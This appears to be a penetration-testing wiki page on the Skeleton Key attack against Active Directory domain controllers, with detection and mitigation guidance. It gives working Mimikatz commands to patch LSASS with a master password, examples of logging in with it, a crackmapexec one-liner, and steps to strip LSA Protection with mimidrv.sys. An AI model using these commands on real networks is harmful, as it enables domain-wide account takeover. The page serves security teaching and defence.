Pentest Everything
GitHubPsMapExec
  • ⚔️Pentest Everything
  • 🚩Writeups
    • CyberSecLabs
      • Active Directory
        • Dictionary
        • Spray (WIP)
      • Linux
        • Shock
        • Pie
      • Windows
        • Brute
        • Deployable
        • Glass
        • Monitor
        • Sam
        • Secret
        • Stack
        • Unattended
        • Weak
    • HackTheBox
      • Active Directory
        • Active
        • Blackfield
        • Cascade
        • Forest
        • Intelligence
        • Mantis
        • Monteverde
        • Resolute
        • Return
        • Sauna
        • Search
      • Linux
        • Antique
        • Armageddon
        • Backdoor
        • Bashed
        • Cap
        • Cronos
        • Curling
        • Knife
        • Lame
        • Help
        • Horizontall
        • OpenAdmin
        • Poison
        • SolidState
        • Traceback
        • Trick
      • Windows
        • Access
        • Artic
        • Bastard
        • Bastion
        • Bounty
        • Devel
        • Heist
        • Jeeves
        • Jerry
        • Legacy
        • Love
        • Optimum
        • Remote
        • SecNotes
        • Servmon
        • Timelapse
        • Querier
    • PG Play | Vulnhub
      • Linux
        • BBSCute
        • BTRSys2.1
        • Born2root
        • BossPlayersCTF
        • Covfefe
        • Dawn
        • DC5
        • Funbox
        • FunboxEasy
        • FunBoxEasyEnum
        • HackerFest2019
        • Geisha
        • JISCTF
        • My-CMSMS
        • NoName
        • OnSystemShellDredd
        • Photographer
        • Potato
        • PyExp
        • Samurai
        • SunsetDecoy
        • SunsetMidnight
        • SunsetTwilight
        • Wpwn
    • PG Practice
      • Linux
        • ClamAV
        • Nibbles
        • Payday
        • Pelican
        • Peppo
        • Postfish
        • Pwned1
        • Snookums
        • Sirol
        • Sorcerer
        • Quackerjack
        • WebCal
        • Walla
        • ZenPhoto
        • Zino
      • Windows
        • Algernon
        • Compromised
        • Kevin
        • Helpdesk
        • Hutch
        • Jacko
        • Meathead
        • Metallus
        • Shenzi
        • Slort
        • UT99
    • TryHackMe
      • Linux
        • All in One
        • Archangel
        • Anonforce
        • Biblioteca
        • Cat Pictures
        • Chill Hack
        • CMesS
        • ColddBox
        • ConvertMyVideo
        • CyberHeroes
        • Cyborg
        • Dav
        • Fusion Corp
        • GamingServer
        • Gallery
        • Internal
        • Jacobtheboss
        • Kiba
        • LazyAdmin
        • Library
        • Madness
        • Marketplace
        • Mustacchio
        • NerdHerd
        • Oh My WebServer
        • Olympus
        • Plotted-TMS
        • Skynet
        • Startup
        • Surfer
        • Team
        • Tech_Supp0rt: 1
        • Tomghost
        • VulnNet
        • Undiscovered
        • Year of the Owl
      • Windows
        • Blueprint
        • Enterprise
        • Flatline
        • Quotient
        • RazorBlack
        • Relevant
        • USTOUN
        • VulnNet: Roasted
    • To Do
      • AllSignsPoint2Pwnage (WIP)
      • Hunit (WIP)
      • Escape (WIP)
      • Banzai (WIP)
      • Billyboss (WIP)
      • Fish
      • Ra
      • Roquefort (WIP)
  • 💾GitHub
  • 🔵 PsMapExec
  • Everything
    • Buffer Overflow Guide
    • Everything Active Directory and Windows
      • Active Directory Enumeration
      • ADCS
        • Enumeration - Certificate Authority
        • ESC1
        • ESC2
        • ESC3
        • ESC4
        • ESC6
        • ESC7
        • ESC8
        • ESC9 - WIP
        • ESC11
      • Access Token Manipultion
        • Token Impersonation
        • Create Process with Token
        • 🔨Make and Impersonate Token
        • Parent PID Spoofing
        • 🔨SID-History Injection
      • Adversary-in-the-Middle
        • 🔨LDAP Relay
        • 🔨LLMNR
        • 🔨RDP MiTM
        • 🔨SMB Relay
      • Credential Access
        • Brute Force
          • Password Spraying
        • Credential Dumping
          • LSASS Memory
          • Security Account Manager (SAM)
          • NTDS
          • LSA Secrets
          • Cached Domain Credentials
          • DCSync
            • 🔨DCSync Attack
        • Credentials from Password Stores
          • Credentials from Web Browsers
          • Windows Credential Manager
        • Unsecured Credentials
          • Credentials In Files
          • Credentials in Registry
          • Group Policy Preferences
            • 🔨GPP Passwords
        • 🔨Modify Authentication Process
          • Domain Controller Authentication: Skeleton Key
          • Reversible Encryption
        • Steal or Forge Kerberos Tickets
          • AS-REP Roasting
          • Golden Ticket
          • Kerberoasting
          • Silver Ticket
          • S4U2Self
          • Ticket Aquisition
          • Constrained Delegation
          • Unconstrained Delegation
      • Collection
        • Clipboard Data
        • Audio Capture
      • Defense Evasion
        • Disable and Bypass Defender
        • Impair Defenses
          • Disable Windows Event Logging
          • Impair Command History Logging
          • Disable or Modify System Firewall
        • Indicator Removal
          • Clear Windows Event Logs
          • Clear Command History
          • File Deletion
          • Network Share Connection Removal
          • Timestomp
      • Input Capture
        • Keylogging
      • Lateral Movement
        • PowerShell Remoting
        • Alternate Authentication Material
          • Pass The Hash
          • Pass the Ticket
          • Pass the Password
      • File Execution Methods
      • File Transfer Techniques
      • Forced Coercion
        • URL File Attack
      • LAPS
      • Network Sniffing
      • Persistence
        • AdminSDHolder
        • BITS Jobs
        • Create Account
          • Local Account
          • Domain Account
          • Cloud Account
        • Create or Modify System Process
          • Windows Service
        • Custom SSP
        • DSRM
        • 🔨Persistence Notes
        • Skeleton Key Attack
      • Privilege Escalation
        • Privilege Escalation Checklist
        • DnsAdmin
        • Registry
          • Always Install Elevated
          • AutoRuns
        • Service Exploits
          • Insecure Service Permissions
      • SCCM / MECM
        • Recon
        • CRED-1 - PXE Abuse
        • CRED-2 - Policy Request Credentials
        • CRED-3 - WMI Local Secrets
        • CRED-4 - CIM Repository
        • CRED-5 - MSSQL Database
        • ELEVATE-2 - Client Push
        • TAKEOVER-2
      • Timeroasting
      • Tools
        • BloodHound
    • Everything Linux
      • File Transfer Techniques
      • Linux Privilege Escalation Techniques
      • Privilege Escalation Checklist
      • Shell Upgrades
    • Everything OSINT
      • Discovering Email Addresses
      • Dork Tools
      • Image OSINT
      • Metadata OSINT
      • Password OSINT
      • Phone Number OSINT
      • Search Engine Operators
      • Social Media OSINT Tools
      • OSINT CTFs
      • OSINT VM
      • Username OSINT
    • Everything Web
      • Command Injection
      • Enumeration
      • File Upload
      • Sub Domain Enumeration
      • XSS
    • Host Discovery
    • Pivoting and Portforwarding
    • Ports
      • Nmap Commands for port discovery
      • Port 21 | FTP
      • Port 25 | SMTP
      • Port 53 | DNS
      • Port 88 | Kerberos
      • Ports 111 | 32771 | rpcbind
      • Port 123 | NTP
      • Ports 137 | 138 | 139 | NetBIOS
      • Ports 139 | 445 | SMB
      • Ports 161 | 162 | SNMP
      • Port 389 | LDAP
      • Ports 1099 | Java RMI
      • Ports 2049 | NFS
      • Port 3389 | RDP
      • Ports 8080 | 8180 | Apache Tomcat
    • PowerShell
      • Constrained Language Mode
      • Download and Execution Methods
      • Resources
      • Restricted Mode
  • Resources
    • Cheat Sheets
      • Default Passwords
      • Kerberoast
      • Mimikatz
      • Powerup
    • Hashcat Word lists and Rules
    • Metasploit Modules
    • Misc Snippets
    • GTFOBins
    • LOLBAS
    • WADCOMS
    • Reverse Shell Generator
    • OSINT Tools
    • Weakpass
  • Password Filter DLL
  • Dork Cheatsheet
Powered by GitBook
On this page
  • Description
  • Prerequisites
  • Exploitation
  • Usage Examples
  • RDP
  • Mapping Remote Shares
  • Crackmapexec
  • Detection
  • Enable audit mode for Lsass.exe (Single System)
  • Enable audit mode for Lsass.exe (Group Policy)
  • Mitigation
  • LSA Protection
  • Multi-factor authentication
  • Application Whitelisting
  • Protecting Domain Administrator accounts
  • Protection Bypass
  • References:
  1. Everything
  2. Everything Active Directory and Windows
  3. Persistence

Skeleton Key Attack

Last updated 2 years ago

Description

The Skeleton Key attack is malware that can be injected into the LSASS process on a Domain Controller and creates a master password that will hijack [sic] any authentication request on the domain and allow an attacker to log in as any user on any system on the domain with the same password.

Prerequisites

  • Attacker must have obtained Domain Admin rights

  • Mimikatz running on a Domain Controller

  • For most effective use all Domain Controllers will need to be exploited however, this is not a hard requirement

  • Rebooting a Domain Controller will remove the malware

Exploitation

After Mimikatz has been dropped onto a Domain Controller and executed with Domain Admin privileges the following simple command can be used to perform the exploit.

privilege::debug #Check for '20' OK debug rights.
misc::skeleton

With the above confirming the Lsass.exe process being successfully patched the password mimikatz can be used to authenticate as any user in the domain.

Usage Examples

RDP

RDP can be used to authenticate against the Skeleton Key to access high level accounts from a GUI. Below we can access the CEO's desktop directly.

xfreerdp /v:<IP> /u:<User> /p:<mimikatz> /d:<Domain> #Syntax
xfreerdp /v:10.10.10.9 /u:CEO /p:mimikatz /d:security.local

Mapping Remote Shares

net use <DriveLetter:> \\<IP>\<Share> /user:<User> mimikatz #Syntax
net use Z: \\10.10.10.9\ADMIN$ /user:Administrator mimikatz

Crackmapexec

With valid Domain Admin credentials crackmapexec can be used to inject the Mimikatz module and Skeleton key command directly to a target Domain Controller.

crackmapexec smb 10.10.10.10 -u 'Administrator' -p 'Password123!' -M mimikatz -o COMMAND='misc::skeleton'

Detection

Enable audit mode for Lsass.exe (Single System)

Edit the registry to the following:

  • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe.

  • Set the value of the registry key to AuditLevel=dword:00000008.

  • Restart the system

Enable audit mode for Lsass.exe (Group Policy)

  1. Expand Computer Configuration, expand Preferences, and then expand Windows Settings.

  2. Right-click Registry, point to New, and then click Registry Item. The New Registry Properties dialog box appears.

  3. In the Hive list, click HKEY_LOCAL_MACHINE.

  4. In the Key Path list, browse to SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe.

  5. In the Value name box, type AuditLevel.

  6. In the Value type box, click to select the REG_DWORD.

  7. In the Value data box, type 00000008.

  8. Click OK.

For the GPO to take effect, the GPO change must be replicated to all domain controllers.

After making required changes the event logs on appropriate systems can be monitored for plug-ins and drivers loaded by lsass.exe

Analyze the results of Event 3033 and Event 3063.

After this, you may see these events in Event Viewer: Microsoft-Windows-Codeintegrity/Operational:

  • Event 3033: This event records that a code integrity check determined that a process (usually lsass.exe) attempted to load a driver that did not meet the Microsoft signing level requirements.

  • Event 3063: This event records that a code integrity check determined that a process (usually lsass.exe) attempted to load a driver that did not meet the security requirements for Shared Sections.

Mitigation

LSA Protection

LSASS can be run in protected mode which may help to prevent this kind of attack. Enabling protected mode ensures any alterations to the LSASS process must be signed by a verified Microsoft signature. A caveat to this is if malware is able to load into the kernel the protection would be nullified.

Perform the follow registry changes to enable LSA protection:

  • HKLM\SYSTEM\CurrentControlSet\Control\Lsa.

  • Set the value of the registry key to: "RunAsPPL"=dword:00000001.

  • Restart the computer.

LSA plug-ins which are NOT compatible with LSA Protection Mode will NOT function after enabling the mode.

To check if LSA Protection is enabled we can check for Event ID 12 from Wininit under the System logs in Event Viewer.

Multi-factor authentication

Skeleton key attacks use single authentication on the network for the post exploitation stage. Multi-factor implementations such as a smart card authentication can help to mitigate this attack.

Application Whitelisting

Protecting Domain Administrator accounts

Ensuring Domain admin accounts are not compromised would mitigate this attack as Domain Admin privileges are a hard requirement to perform a skeleton key attack

Protection Bypass

The below image represents an attempt to access the lsass.exe process and extract clear text passwords and run a skeleton key attack. As we can see this has not been successful since applying the registry key change mentioned in the mitigation section for LSA Protection.

We can check if the LSA Protection RunAsPPL key exists by querying the registry to confirm the LSA protection is in place.

reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v "RunAsPPL"
# Value 0x1 means LSA Protection is enabled

This can be bypassed however by utilizing the mimidrv.sys driver file which is included as a separate file with mimikatz.

The mimidrv.sys driver file needs to exists in the same directory as mimikatz.exe.

The driver can be loaded by running the command !+ in Mimikatz. After doing so the follow command can be execute to protect the mimikatz.exe process.

!processProtect /process:mimikatz.exe

The same command with the /remove flag can be used to strip the process protection from a process such as lsass.exe

!processprotect /process:lsass.exe /remove

After doing so it is possible to bypass the LSA protection as shown below where the command misc::skeleton is performed and successfully completes.

References:

Application whitelisting can be utilized to stop unapproved applications being executed on the Domain Controller. ** **would be an appropriate solution in this circumstance.

** **

AppLocker
https://riccardoancarani.github.io/2020-08-08-hunting-for-skeleton-keys/
https://ldapwiki.com/wiki/LSA%20Protection
https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection
https://itm4n.github.io/lsass-runasppl/
https://gorkemkaradeniz.medium.com/defeating-runasppl-utilizing-vulnerable-drivers-to-read-lsass-with-mimikatz-28f4b50b1de5
https://posts.specterops.io/mimidrv-in-depth-4d273d19e148